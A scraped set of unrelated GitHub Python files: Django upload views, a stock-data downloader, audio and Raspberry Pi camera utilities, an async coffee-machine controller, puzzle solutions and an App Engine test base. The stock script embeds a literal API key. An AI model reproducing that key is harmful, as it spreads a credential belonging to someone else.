datasheet=cd['datasheet'],refdesign=cd['refdesign'],refcode=cd['refcode'],\n refsch=cd['refsch'])\n\n try:\n ic1.save()\n except IntegrityError:\n path=os.path.join(BASE_DIR, \"media/datasheet/\")\n file=path+str(cd['datasheet'])\n os.remove(file)\n return render(request, 'ds_upload.html', {'form': form,'error_mypn':'Duplicated!','data':form.data})\n\n return render(request,\"ds_sucess.html\")\n\n\n else:\n form = DSForm(\n initial={'subject': 'I love your site!'})\n return render(request, 'ds_upload.html', {'form':form,})\ndef dsshow(request):\n a=ic.objects.all()\n result=[]\n for i in a:\n type=choice[int(i.type)][1]\n new={'mypn':i.mypn,'value':i.value,'type':type,'description':i.description,\n 'venderpn':i.venderpn,'datasheet':i.datasheet,'refdesign':i.refdesign,'refcode':i.refcode,\n 'refsch':i.refsch,'time':i.time}\n result.append(new)\n #return HttpResponse('ok')\n return render(request, 'ds_show.html', {'result':result})\n\n@login_required()\ndef dschange(request,mypn):\n ic1 = ic.objects.filter(mypn=mypn)\n lastds=ic1[0].datasheet\n if request.method == 'POST':\n ic1.delete()\n form = DSForm(request.POST, request.FILES)\n if form.is_valid():\n cd = form.cleaned_data\n if not cd['datasheet']:\n cd['datasheet']=lastds\n else:\n path = os.path.join(BASE_DIR, \"media/\")\n file = path + str(lastds)\n os.remove(file)\n ic1 = ic(mypn=cd['mypn'], value=cd['value'],\n type=cd['type'], description=cd['description'], venderpn=cd['venderpn'],\n datasheet=cd['datasheet'], refdesign=cd['refdesign'], refcode=cd['refcode'],\n refsch=cd['refsch'])\n\n try:\n ic1.save()\n except IntegrityError:\n return render(request, 'ds_change.html', {'form': form, 'error': 'Duplicated!', 'data': form.data})\n return render(request, \"ds_sucess.html\")\n else:\n\n form = DSForm(\n initial={'subject': 'I love your site!'})\n for i in ic1:\n data = {'mypn': i.mypn, 'value': i.value, 'type': type, 'description': i.description,\n 'venderpn': i.venderpn, 'datasheet': i.datasheet, 'refdesign': i.refdesign, 'refcode': i.refcode,\n 'refsch': i.refsch,}\n\n return render(request, 'ds_change.html', {'form': form, 'data': data})\n","repo_name":"zengfu/web_django","sub_path":"ds/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"12256502014","text":"import argparse\n\n\ndef prepare_args() -> argparse.Namespace:\n \"\"\"\n Подготавливает и парсит аргументы командной строки.\n\n :return: argparse.Namespace\n Объект, содержащий значения аргументов командной строки.\n \"\"\"\n arg_parser = argparse.ArgumentParser(\n prog='tracert-as',\n description='A tool for '\n )\n arg_parser.add_argument('hostname', type=str, help=\"Hostname to trace\")\n arg_parser.add_argument(\"--ttl\", type=int, help=\"Max hops count\",\n default=25)\n\n return arg_parser.parse_args()\n","repo_name":"XamaX8008/tracert-as","sub_path":"services/prepare_args.py","file_name":"prepare_args.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"25110841771","text":"import datetime as dt\nimport json\nimport os\nimport urllib.request\n\nimport pandas as pd\n\n# Please get your own FREE api key on https://www.alphavantage.co/support/#api-key\napi_key = '8H5AO0K6RF3VZPLT'\n\n\ndef mkdir(path):\n path = path.strip()\n exist = os.path.exists(path)\n if not exist:\n os.makedirs(path)\n print('Folder: \"{}\" Successfully Built'.format(path))\n return True\n else:\n print('Folder: \"{}\" Already Exist'.format(path))\n return False\n\n\ndef get_stock_prices_us(ticker):\n ticker = ticker.upper()\n url_string = \"https://www.alphavantage.co/query?function=TIME_SERIES_DAILY&symbol=%s&outputsize=full&apikey=%s\" % (\n ticker, api_key)\n\n # Create a folder to save the downloaded data\n mkpath = \"data\"\n mkdir(mkpath)\n # Save data to this directory\n file_to_save = 'data/us_market-{}.csv'.format(ticker)\n\n # To check if that ticker is already downloaded to local\n if not os.path.exists(file_to_save):\n print('Downloading Data of {}...'.format(ticker))\n with urllib.request.urlopen(url_string) as url:\n data = json.loads(url.read().decode())\n data = data['Time Series (Daily)']\n df = pd.DataFrame(columns=['Date', 'Low', 'High', 'Close', 'Open'])\n for k, v in data.items():\n date = dt.datetime.strptime(k, '%Y-%m-%d')\n data_row = [date.date(), float(v['3. low']), float(v['2. high']),\n float(v['4. close']), float(v['1. open'])]\n df.loc[-1, :] = data_row\n df.index = df.index + 1\n print('Data saved to : %s' % file_to_save)\n df.to_csv(file_to_save, index=False)\n\n else:\n print('File already exists. Loading data from local...')\n df = pd.read_csv(file_to_save)\n\n return df\n\n\nif __name__ == '__main__':\n get_stock_prices_us('AAL')\n","repo_name":"pisaller/Time-Series_by_LSTM","sub_path":"core/readData_US.py","file_name":"readData_US.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"4914501995","text":"def timeRepr(*seconds, joint=\", \"):\n res = []\n for p in seconds:\n mins = p // 60\n hours = mins // 60\n remainSeconds = p - mins * 60\n mins = mins - hours * 60\n res.append(f\"{hours}:{mins}:{remainSeconds}\")\n if(len(seconds) == 1):\n return res[0]\n # return res\n return joint.join(res)\n\ndef average(iterable):\n s = 0\n l = 0\n for x in iterable:\n s += x\n l += 1\n return s / l # TODO: raises exception if length is 0\n\ndef groupclosest(valuesList, tolerance=8):\n #? 1. We may make this function by clustering points using machine learning kmeans algo\n #? 2. We want to use variance of every group, the variance give info about the rate of speaking ==> sound should have high variance\n groups = []\n valuesList = sorted(valuesList)[::-1]\n basei = 0\n for i, val in enumerate(valuesList):\n if (abs(val[0] - valuesList[basei][0]) > tolerance):\n newGroup = valuesList[basei:i]\n newGroup = sorted(newGroup, key=lambda x: x[1]) # sort over the group over item itself\n # print(\"newGroup\", newGroup)\n # groups.append(valuesList[basei:i])\n groups.append(newGroup)\n basei = i\n lastGroup = valuesList[basei:len(valuesList)]\n lastGroup = sorted(lastGroup, key=lambda x: x[1])\n groups.append(lastGroup)\n return groups\n\ndef fileExt(path):\n ext = path.split(\".\")[-1]\n if(ext): return ext.upper()\n return None\n\ndef replaceExt(path, newExt):\n return path.replace(\".\" + fileExt(path), \".\" + newExt)\n\nimport wave\nimport pydub\n\nimport gc\ndef readWaveFile(path, start = 0, end = None, sequential=True):\n '''\n sequential: default to true, read the file sequentially and return bytearray to be editable to add silence or any sound without copying\n if false, that will be read entirely at one read and the object returned in bytes type\n '''\n # read data\n wav = wave.open(path, 'rb')\n nchannels, sampwidth, framerate, nframes, *_ = wav.getparams()\n epos = end * framerate if end != None else nframes\n spos = start * framerate\n wav.setpos(spos)\n duration = (epos - spos)\n\n def readSequentially(spos, epos):\n print(\"readSequentially\", spos, epos, framerate)\n maxOneRead = 5 * 60 * framerate\n res = bytearray()\n remained = duration\n while (spos < epos): #? should be <=, or <\n print(spos)\n wav.setpos(spos) #? can we delete this line\n data = wav.readframes(min(maxOneRead, remained) )\n data = bytearray(data)\n gc.collect()\n remained -= maxOneRead\n res.extend(data)\n spos += maxOneRead\n return res\n data = readSequentially(spos, epos) if sequential else wav.readframes(duration)\n wav.close()\n \n # move to audio segment\n audio = pydub.AudioSegment.silent(duration=0, frame_rate=framerate)\n audio._data = bytearray(data)\n audio.sample_width = sampwidth\n audio.frame_rate = framerate\n audio.channels = nchannels\n audio.frame_width = audio.channels * audio.sample_width\n return audio\n\ndef incDbfs(obj):\n lenObj = len(obj)\n if (lenObj < 1000 * 9 * 60):\n return obj.dBFS\n every = 2 * 60 * 1000\n currentOffset = 0\n sumall = 0\n while currentOffset < lenObj:\n seg = obj[currentOffset:every]\n sumall += seg.dBFS\n currentOffset += every\ntry:\n from audio_metadata import load as fileInfo\n getFileLength = lambda path: ('duration', fileInfo(path)[\"streaminfo\"][\"duration\"])\nexcept:\n from os import stat as fileInfo\n getFileLength = lambda p: ('size', fileInfo(p).st_size)\n\nfrom os.path import getsize as getFileSize\n\nfrom math import ceil\ndef approxToNearestSeconds(time):\n return ceil(time / 1000) * 1000\n\ndef isDiff(x, y, tolerance):\n return abs(x - y) > tolerance\n\ndef circularIncIndex(arrayLength, currentIndex): return (currentIndex + 1) % arrayLength\ndef circularDecIndex(arrayLength, currentIndex): return (currentIndex - 1) % arrayLength\n\nimport json\ndef is_jsonable(x):\n try:\n json.dumps(x)\n return True\n except (TypeError, OverflowError):\n return False\n\nclass QuranPersistor:\n _quran = None\n _path = \"quran-simple-clean.txt\"\n\n\n @staticmethod\n def quran():\n if (not QuranPersistor._quran):\n with open(QuranPersistor._path, 'r', encoding=\"utf-8\") as quranFile:\n QuranPersistor._quran = quranFile.read().splitlines(False)\n return QuranPersistor._quran\n\n\nif __name__ == \"__main__\":\n print(QuranPersistor.quran()[0:5])\n","repo_name":"AmmarRabie/auto-combine-moshaf","sub_path":"src/helpers/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4623,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"5303696577","text":"# -*- coding: utf-8 -*-\n\nimport time\nimport math\nimport asyncio\nfrom logzero import logger\nfrom services.barista.point import Point\nfrom services.barista.point_translator import point_to_gcode\nfrom services.barista.point_translator import point_to_hcode\nfrom services.refill_service import RefillClient\nfrom services.output_temp_service import OutputTempClient\nfrom services.tank_temp_service import TankTempClient\n\n\nclass WasteWaterPosition(Point):\n def __init__(self, x, y, z):\n super(WasteWaterPosition, self).__init__()\n self.x = x\n self.y = y\n self.z = z\n\n\nclass WaterTransformer(object):\n def __init__(self, pid, output_temp):\n self._pid = pid\n self._output_temp = output_temp\n self._accumulated_water = 0\n self._current_target_temperature = None\n self._current_percentage = None\n self.low_temperature = None\n self.high_temperature = None\n self._previous_time = None\n self.reset()\n\n def reset(self):\n self._accumulated_water = 0\n self._current_target_temperature = None\n self._current_percentage = None\n self._previous_time = None\n self._pid.reset()\n\n async def transform(self, point):\n if point.t is not None and point.t != self._current_target_temperature:\n self._current_target_temperature = point.t\n self._current_percentage = (\n self._current_target_temperature - self.low_temperature) / (\n self.high_temperature - self.low_temperature)\n self.reset()\n\n if point.e is not None:\n if self._accumulated_water >= 10:\n temperature = await self._output_temp.get_temperature()\n diff_time = 0\n if self._previous_time is not None:\n current_time = time.time()\n diff_time = current_time - self._previous_time\n self._previous_time = current_time\n percentage = self._current_percentage + self._pid(\n temperature, self._current_target_temperature,\n diff_time) / 100\n if percentage > 1:\n percentage = 1\n elif percentage < 0:\n percentage = 0\n self._accumulated_water = 0\n\n point.e1 = point.e * percentage\n point.e2 = point.e - point.e1\n self._accumulated_water += point.e\n\n\nclass TimeTransformer(object):\n def __init__(self, x=0, y=0, z=0):\n self._position = Point.create_point(x=x, y=y, z=z)\n\n async def transform(self, point):\n if point.time is not None:\n return\n distance = self._calc_distance(point)\n if distance == 0:\n point.time = point.f\n else:\n point.time = distance * 60 / point.f\n self.set_position(x=point.x, y=point.y, z=point.z)\n\n def set_position(self, x=None, y=None, z=None):\n if x is not None:\n self._position.x = x\n if y is not None:\n self._position.y = y\n if z is not None:\n self._position.z = z\n\n def _calc_distance(self, point):\n distance = 0\n if point.x is not None:\n distance += (point.x - self._position.x)**2\n if point.y is not None:\n distance += (point.y - self._position.y)**2\n if point.z is not None:\n distance += (point.z - self._position.z)**2\n return math.sqrt(distance)\n\n\nclass Barista(object):\n def __init__(self, moving_dev, extruder_dev, mix_pid_dev,\n waste_water_position, default_moving_speed, bus):\n self._commands = {\n \"wait\": self._create_wait,\n \"calibration\": self._create_calibration,\n \"waste_water\": self._create_waste_water,\n \"mix\": self._create_mix,\n \"home\": self._create_home\n }\n\n self._moving_dev = moving_dev\n self._extruder_dev = extruder_dev\n self._waste_water_position = waste_water_position\n self._default_moving_speed = 5000\n self._bus = bus\n self._refill = RefillClient(bus)\n self._output_temp = OutputTempClient(bus)\n self._tank_temp = TankTempClient(bus)\n self._water_transformer = WaterTransformer(mix_pid_dev,\n self._output_temp)\n self._time_transformer = TimeTransformer()\n\n self._high_temperature = None\n self._low_temperature = None\n self._accumulated_water = 0\n\n self._stop = False\n self._stop_event = asyncio.Event()\n self._queue = asyncio.Queue(maxsize=1)\n\n self._position = Point.create_point(x=0, y=0, z=0)\n\n def _create_wait(self, param):\n _time = param['time']\n\n async def implement():\n nonlocal self\n nonlocal _time\n while not self._stop and _time > 0:\n asyncio.sleep(1)\n _time -= 1\n return True\n\n return implement\n\n def _create_calibration(self, _):\n async def implement():\n nonlocal self\n # move\n await self._move_to_waste_water_position()\n\n async def test_stable_temperature(self, points):\n pre_temp = await self._output_temp.get_temperature()\n if pre_temp is None:\n return None\n while True:\n await self._handle_point(points)\n temp = await self._output_temp.get_temperature()\n if temp is None:\n return None\n\n slope = abs((temp - pre_temp) / 5)\n if slope > 3 / 5:\n pre_temp = temp\n continue\n return temp\n\n # e2\n points = [Point.create_point(e2=0.6, time=0.1)] * 50\n self._water_transformer.high_temperature = await test_stable_temperature(\n self, points)\n if self._high_temperature is None:\n return False\n\n # e1\n points = [Point.create_point(e1=0.6, time=0.1)] * 50\n self._water_transformer.low_temperature = await test_stable_temperature(\n self, points)\n if self._low_temperature is None:\n return False\n return True\n\n return implement\n\n def _create_waste_water(self, _):\n async def implement():\n nonlocal self\n await self._move_to_waste_water_position()\n points = [Point.create_point(e1=3, e2=3, t=1)] * 10\n self._handle_point(points)\n return True\n\n return implement\n\n def _create_mix(self, param):\n target_temperature = param['t']\n\n async def implement():\n nonlocal self\n await self._move_to_waste_water_position()\n points = [\n Point.create_point(e=0.5, t=target_temperature, time=0.1)\n ] * 20\n previous_temperature = await self._output_temp.get_temperature()\n while True:\n self._handle_point(points)\n current_temperature = await self._output_temp.get_temperature()\n diff = abs(current_temperature - target_temperature)\n slope = abs(current_temperature - previous_temperature)\n if diff < 0.5 and slope < 3 / 5:\n break\n previous_temperature = current_temperature\n return True\n\n return implement\n\n def _create_home(self, _):\n async def implement():\n nonlocal self\n self._moving_dev.send('G28')\n self._time_transformer.set_position(x=0, y=0, z=0)\n return True\n\n return implement\n\n def _create_handle_points(self, point_param):\n async def implement():\n nonlocal self\n nonlocal point_param\n point = [Point.create_point(*point_param)]\n await self._handle_point(point)\n return True\n\n return implement\n\n async def _handle_point(self, points):\n for point in points:\n await self._water_transformer.transform(point)\n await self._time_transformer.transform(point)\n\n gcode = point_to_gcode(point)\n hcode = point_to_hcode(point)\n\n if gcode is not None:\n self._moving_dev.send(gcode)\n if hcode is not None:\n self._extruder_dev.send(hcode)\n\n if gcode is not None:\n while self._moving_dev.recv() != 'ok':\n await asyncio.sleep(0.1)\n if hcode is not None:\n while self._extruder_dev.recv() != 'ok':\n await asyncio.sleep(0.1)\n\n async def start(self):\n await self._bus.reg_rep('barista', self.command_callback)\n self._moving_dev.connect(3)\n self._extruder_dev.connect(3)\n\n # HOME, Set Unit to Millimeters,\n # Set to Absolute Positioning, Set extruder to relative mode\n for cmd in ['G28', 'G21', 'G90', 'M83']:\n self._moving_dev.send(cmd)\n\n while True:\n params = await self._queue.get()\n await self.brew(params)\n\n async def brew(self, params):\n await self._refill.stop()\n\n # XXX: maybe from config\n if self._water_transformer.low_temperature is None:\n self._water_transformer.low_temperature = 20\n if self._water_transformer.high_temperature is None:\n self._water_transformer.high_temperature = await self._tank_temp.get_temperature(\n )\n\n commands = []\n for param in params:\n if param['type'] == 'command' and param['name'] in self._commands:\n commands.append(self._commands[param['name']](param))\n elif 'point' in param:\n commands.append(self._create_handle_points(param['point']))\n else:\n logger.error('Invalid input point %s', param)\n continue\n\n self._reset()\n for command in commands:\n await command()\n\n await self._refill.start()\n\n async def command_callback(self, data):\n cmd = data['command']\n if cmd == 'get':\n return await self._status()\n elif cmd == 'brew':\n points = data['points']\n try:\n self._queue.put_nowait(points)\n return {'status': 'ok'}\n except asyncio.QueueFull:\n return {'status': 'error', 'message': 'barista is busy'}\n\n def _reset(self):\n self._time_transformer.set_position(0, 0, 0)\n self._water_transformer.reset()\n\n async def _status(self):\n return {'status': 'ok'}\n\n async def _move_to_waste_water_position(self):\n points = [\n Point.create_move_point(\n x=self._waste_water_position.x,\n y=self._waste_water_position.y,\n z=self._waste_water_position.z,\n f=self._default_moving_speed)\n ]\n await self._handle_point(points)\n","repo_name":"Swind/TuringHardware","sub_path":"src/services/barista/barista.py","file_name":"barista.py","file_ext":"py","file_size_in_byte":11171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"38659720784","text":"import collections\n\n\ndef getTriNum(n):\n return n*(n+1)/2\n\n\ndef getPrimeFactors(n):\n primes = []\n i = 2\n while i <= n:\n if n % i == 0:\n n = n/i\n primes.append(i)\n else:\n i = i + 1\n return primes\n\n\ndef getPrimeDuplicity(prime_factors):\n counter = collections.Counter(prime_factors)\n return counter.values()\n\n\ndef countPrimeFactors(primeDuplicity):\n powers = [x + 1 for x in primeDuplicity]\n product = 1\n for x in powers:\n product = x*product\n return product\n\n\nn_factors_max = 0\nfor i in range(0, 100000):\n n_factors = countPrimeFactors(\n getPrimeDuplicity(getPrimeFactors(getTriNum(i))))\n if n_factors > 500:\n print(i, ' ', getTriNum(i), ' ', n_factors)\n break\n","repo_name":"acjensen/project-euler","sub_path":"0012_HighlyDivisibleTriangularNumber.py","file_name":"0012_HighlyDivisibleTriangularNumber.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"29429163331","text":"import torch\nfrom neko_sdk.ocr_modules.renderlite.addfffh import refactor_meta,add_masters,finalize\n\ndef buildrej(srcpt,dstpt,k=400):\n a=torch.load(srcpt);\n dst={};\n dst[\"chars\"]=a[\"chars\"][:k];\n dst[\"protos\"]=a[\"protos\"][:k+1]+[None];\n dst[\"sp_tokens\"]=a[\"sp_tokens\"];\n dst[\"label_dict\"]={};\n cnt=0;\n for c in dst[\"sp_tokens\"]:\n dst[\"label_dict\"][c]=cnt;\n cnt+=1;\n for c in dst[\"chars\"]:\n dst[\"label_dict\"][c]=cnt;\n cnt+=1;\n dst[\"label_dict\"]['[UNK]']=cnt;\n refactor_meta(dst);\n add_masters(dst, [], []);\n dst = finalize(dst);\n torch.save(dst,dstpt);\n print(\"built\",dstpt)\nif __name__ == '__main__':\n import sys\n if(len(sys.argv)>1):\n DROOT = sys.argv[1];\n else:\n DROOT= \"/run/media/lasercat/cache2/\"\n\n HWDB_ROOT = DROOT+\"/HWDB/pami_ch_fsl_hwdb/hwdbfsl_10_1/cuwu_evalhwdbfsl_10_1/\";\n CTW_ROOT = DROOT+\"/ctwch/ctwfsl_5_1eval/\";\n\n # buildrej(HWDB_ROOT+\"dict.pt\",HWDB_ROOT+\"dictrej.pt\");\n buildrej(HWDB_ROOT+\"dict.pt\",\n HWDB_ROOT+\"dictrej500.pt\",k=500);\n buildrej(HWDB_ROOT+\"dict.pt\",\n HWDB_ROOT+\"dictrej400.pt\",k=400);\n buildrej(HWDB_ROOT+\"dict.pt\",\n HWDB_ROOT+\"dictrej200.pt\",k=200);\n buildrej(HWDB_ROOT+\"dict.pt\",\n HWDB_ROOT+\"dictrej100.pt\",k=100);\n\n buildrej(CTW_ROOT+\"dict.pt\",CTW_ROOT+\"dictrej250.pt\",k=250);\n buildrej(CTW_ROOT+\"dict.pt\",CTW_ROOT+\"dictrej200.pt\",k=200);\n buildrej(CTW_ROOT+\"dict.pt\",CTW_ROOT+\"dictrej100.pt\",k=100);\n buildrej(CTW_ROOT+\"dict.pt\",CTW_ROOT+\"dictrej50.pt\",k=50);\n","repo_name":"lancercat/OSOCR-data","sub_path":"code/osocr_tasks/tasksg1/char_rej.py","file_name":"char_rej.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"19427861877","text":"# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n def hasCycle(self, head: ListNode) -> bool:\n ht = {}\n cur = head\n while cur:\n if cur.val in ht:\n return True\n else:\n ht[cur.val] = 1\n cur = cur.next\n\n return False","repo_name":"soph666/code_challenges","sub_path":"Python/LeetCode_141_LinkedListCycle.py","file_name":"LeetCode_141_LinkedListCycle.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"40833684824","text":"def sub(aae1): \n mmnt = len(aae1) \n sub = [1]*mmnt \n for j in range (1 , mmnt): \n for i in range(0 , j): \n if aae1[j] > aae1[i] and sub[j]< sub[i] + 1 : \n sub[j] = sub[i]+1\n maximum = 0\n for j in range(mmnt): \n maximum = max(maximum , sub[j]) \n return maximum\naar1=int(input()) \naae1 = list(map(int,input().split()))\nprint (sub(aae1))\n","repo_name":"Roshini28/pythonpgm","sub_path":"pro26.py","file_name":"pro26.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35551003646","text":"from time import sleep\nfrom picamera import PiCamera\nimport datetime\n\nDEFAULT_FOLDER = \"/home/pi/Desktop/\"\ncamera = PiCamera()\ncamera.resolution = (2592, 1944)\ncamera.rotation = 180\n\n\ndef capture_pic(folder=DEFAULT_FOLDER, name=None):\n global camera\n if camera.closed:\n camera = PiCamera()\n with camera as cam:\n if name:\n cam.capture(folder + name)\n else:\n cam.capture(folder + \"preview \" + fecha_formateada() + \".jpg\")\n\n\ndef capture_stream_pic(stream):\n global camera\n if camera.closed:\n camera = PiCamera()\n camera.capture(stream, format='jpeg')\n\n\ndef calcular_tiempo_time_lapse(cant_fotos, tiempo_entre_foto):\n return str(datetime.timedelta(seconds=cant_fotos * tiempo_entre_foto))\n\n\ndef time_lapse(cant_fotos, tiempo_entre_foto, folder=DEFAULT_FOLDER):\n image_number = 1\n while cant_fotos >= image_number:\n image_name = 'image{0:04d}.jpg'.format(image_number)\n camera.capture(folder + image_name)\n print(\"Foto \" + str(image_number) + \" de \" + str(cant_fotos))\n image_number += 1\n sleep(tiempo_entre_foto)\n camera.close()\n\n\ndef start_preview(time=5, fullscreen=False):\n camera.resolution = (1920, 1080)\n camera.start_preview(fullscreen = fullscreen, window=(0,0,640, 480)) \n sleep(time)\n if not time == 0:\n camera.stop_preview()\n\n\ndef stop_preview():\n camera.stop_preview()\n camera.close()\n\n\ndef record(time=5, folder=DEFAULT_FOLDER):\n with camera as cam:\n cam.resolution = (1920, 1080)\n cam.start_preview()\n cam.start_recording(folder + 'video' + fecha_formateada() + '.h264')\n sleep(time)\n cam.stop_recording()\n cam.stop_preview()\n\n\ndef show_effects(time=2):\n camera.resolution = (1920, 1080)\n camera.start_preview()\n for effect in camera.IMAGE_EFFECTS:\n camera.image_effect = effect\n camera.annotate_text = \"Effect: %s\" % effect\n sleep(time)\n camera.stop_preview()\n\n\ndef show_exposure(time=2):\n camera.resolution = (1920, 1080)\n camera.start_preview()\n for exposure in camera.EXPOSURE_MODES:\n camera.exposure_mode = exposure\n camera.annotate_text = \"Exposure: %s\" % exposure\n sleep(time)\n camera.stop_preview()\n\n\ndef fecha_formateada():\n return str(datetime.datetime.now().strftime(\"%Y-%m-%d %H-%M-%S\"))\n\n\ndef zoomear(x, y, w, h):\n camera.zoom = (x, y, w, h)\n","repo_name":"fbacinello/raspberry","sub_path":"camera/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"26679959213","text":"__author__ = 'Sean Lip'\n\nimport argparse\nimport cStringIO\nimport logging\nimport os\nimport pdb\nimport shutil\nimport sys\nimport unittest\n\nimport task_queue\n\nimport webtest\n\nimport appengine_config\nfrom tools.etl import etl\n\nfrom google.appengine.api.search import simple_search_stub\nfrom google.appengine.datastore import datastore_stub_util\nfrom google.appengine.ext import testbed\n\n_PARSER = argparse.ArgumentParser()\n_PARSER.add_argument(\n '--test_class_name',\n help='optional dotted module name of the test(s) to run', type=str)\n_PARSER.add_argument(\n '--pdb',\n action='store_true',\n help='Automatically enter a debugger when an error occurs.')\n\n# Direct key access so we'll throw if os.environ is misconfigured.\nTEST_DATA_BASE = os.path.join(\n os.environ['COURSEBUILDER_RESOURCES'], 'test-data')\n\n\ndef empty_environ():\n os.environ['AUTH_DOMAIN'] = 'example.com'\n os.environ['SERVER_NAME'] = 'localhost'\n os.environ['HTTP_HOST'] = 'localhost'\n os.environ['SERVER_PORT'] = '8080'\n os.environ['USER_EMAIL'] = ''\n os.environ['USER_ID'] = ''\n os.environ['DEFAULT_VERSION_HOSTNAME'] = (\n os.environ['HTTP_HOST'] + ':' + os.environ['SERVER_PORT'])\n\n\ndef iterate_tests(test_suite_or_case):\n \"\"\"Iterate through all of the test cases in 'test_suite_or_case'.\"\"\"\n try:\n suite = iter(test_suite_or_case)\n except TypeError:\n yield test_suite_or_case\n else:\n for test in suite:\n for subtest in iterate_tests(test):\n yield subtest\n\n\nclass TestBase(unittest.TestCase):\n \"\"\"Base class for all Course Builder tests.\"\"\"\n\n INTEGRATION_SERVER_BASE_URL = 'http://localhost:8081'\n ADMIN_SERVER_BASE_URL = 'http://localhost:8000'\n\n STOP_AFTER_FIRST_FAILURE = False\n HAS_PENDING_FAILURE = False\n\n # Log level for all tests in this test case. Override if you need to test\n # against different logging levels. Be very careful when setting this to\n # logging.DEBUG: downstream code is sometimes very chatty at logging.DEBUG,\n # and can generate enough logging data that tests run out of memory.\n LOG_LEVEL = logging.ERROR\n\n def setUp(self):\n if TestBase.STOP_AFTER_FIRST_FAILURE:\n assert not TestBase.HAS_PENDING_FAILURE\n super(TestBase, self).setUp()\n self._set_up_logging()\n # e.g. TEST_DATA_BASE/tests/functional/tests/MyTestCase.\n self.test_tempdir = os.path.join(\n TEST_DATA_BASE, self.__class__.__module__.replace('.', os.sep),\n self.__class__.__name__)\n self.reset_filesystem()\n self._originals = {} # Map of object -> {symbol_string: original_value}\n\n def _set_up_logging(self):\n self._log = cStringIO.StringIO()\n self._stream_handler = logging.StreamHandler(self._log)\n self._stream_handler.setFormatter(\n logging.Formatter(fmt='%(levelname)s: %(message)s'))\n self._logger = logging.getLogger()\n self._logger.addHandler(self._stream_handler)\n self._logger.setLevel(self.LOG_LEVEL)\n\n def tearDown(self):\n self._unswap_all()\n self.reset_filesystem(remove_only=True)\n self._tear_down_logging()\n super(TestBase, self).tearDown()\n\n def _tear_down_logging(self):\n self._logger.removeHandler(self._stream_handler)\n self._log.close()\n\n def get_log(self):\n self._log.flush()\n return self._log.getvalue()\n\n def assertLogContains(self, message):\n self.assertIn(message, self.get_log())\n\n def assertLogDoesNotContain(self, message):\n self.assertNotIn(message, self.get_log())\n\n def reset_filesystem(self, remove_only=False):\n if os.path.exists(self.test_tempdir):\n shutil.rmtree(self.test_tempdir)\n if not remove_only:\n os.makedirs(self.test_tempdir)\n\n def run(self, result=None):\n if not result:\n result = self.defaultTestResult()\n super(TestBase, self).run(result)\n if not result.wasSuccessful():\n TestBase.HAS_PENDING_FAILURE = True\n\n def shortDescription(self):\n \"\"\"Additional information logged during unittest invocation.\"\"\"\n # Suppress default logging of docstrings. Instead log name/status only.\n return None\n\n def swap(self, source, symbol, new): # pylint: disable=invalid-name\n \"\"\"Swaps out source.symbol for a new value.\n\n Allows swapping of members and methods:\n\n myobject.foo = 'original_foo'\n self.swap(myobject, 'foo', 'bar')\n self.assertEqual('bar', myobject.foo)\n myobject.baz() # -> 'original_baz'\n self.swap(myobject, 'baz', lambda: 'quux')\n self.assertEqual('quux', myobject.bar())\n\n Swaps are automatically undone in tearDown().\n\n Args:\n source: object. The source object to swap from.\n symbol: string. The name of the symbol to swap.\n new: object. The new value to swap in.\n \"\"\"\n if source not in self._originals:\n self._originals[source] = {}\n if not self._originals[source].get(symbol, None):\n self._originals[source][symbol] = getattr(source, symbol)\n setattr(source, symbol, new)\n\n def _unswap_all(self):\n for source, symbol_to_value in self._originals.iteritems():\n for symbol, value in symbol_to_value.iteritems():\n setattr(source, symbol, value)\n\n\nclass FunctionalTestBase(TestBase):\n \"\"\"Base class for functional tests.\"\"\"\n\n\nclass AppEngineTestBase(FunctionalTestBase):\n \"\"\"Base class for tests that require App Engine services.\"\"\"\n\n def getApp(self):\n \"\"\"Returns the main application to be tested.\"\"\"\n raise Exception('Not implemented.')\n\n def setUp(self):\n super(AppEngineTestBase, self).setUp()\n empty_environ()\n\n # setup an app to be tested\n self.testapp = webtest.TestApp(self.getApp())\n self.testbed = testbed.Testbed()\n self.testbed.activate()\n\n # configure datastore policy to emulate instantaneously and globally\n # consistent HRD; we also patch dev_appserver in main.py to run under\n # the same policy\n policy = datastore_stub_util.PseudoRandomHRConsistencyPolicy(\n probability=1)\n\n # declare any relevant App Engine service stubs here\n self.testbed.init_user_stub()\n self.testbed.init_memcache_stub()\n self.testbed.init_datastore_v3_stub(consistency_policy=policy)\n self.testbed.init_taskqueue_stub(root_path=os.environ['SOURCE_DIR'])\n self.taskq = self.testbed.get_stub(testbed.TASKQUEUE_SERVICE_NAME)\n self.testbed.init_urlfetch_stub()\n self.testbed.init_files_stub()\n self.testbed.init_blobstore_stub()\n self.testbed.init_mail_stub()\n self.testbed.init_app_identity_stub()\n # TODO(emichael): Fix this when an official stub is created\n self.testbed._register_stub(\n 'search', simple_search_stub.SearchServiceStub())\n self.task_dispatcher = task_queue.TaskQueueHandlerDispatcher(\n self.testapp, self.taskq)\n\n # Handle for testing sent mail.\n self.mail_stub = self.testbed.get_stub(testbed.MAIL_SERVICE_NAME)\n\n def tearDown(self):\n self.testbed.deactivate()\n 